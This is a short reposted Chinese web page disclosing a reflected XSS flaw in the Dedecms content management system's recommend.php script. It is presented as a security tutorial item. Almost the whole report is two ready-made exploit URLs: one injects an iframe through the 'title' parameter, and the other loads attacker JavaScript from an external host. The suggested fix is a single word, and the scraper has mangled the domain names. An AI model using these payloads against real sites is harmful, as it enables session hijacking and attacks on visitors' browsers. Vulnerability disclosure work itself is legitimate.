好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Dedecms最新版一处反射型XSS漏洞 - 网站安全 - 自学

Dedecms 一处 XSS 漏洞 ,有图就有真相

http://v57.demo.dedecms测试数据/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//HdhCmsTestbaidu测试数据%3E%3C/iframe%3E http://v57.demo.dedecms测试数据/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xss.js%3E%3C/SCRIPT%3E  

 

 

修复方案:

过滤!

查看更多关于Dedecms最新版一处反射型XSS漏洞 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15224
  阅读:54次

上一篇: magicwinmail两处存储型XSS打包 - 网站安全 - 自学p

下一篇:Ecmall V2.3.0-UTF8正式版SQL注入漏洞打包 - 网站安全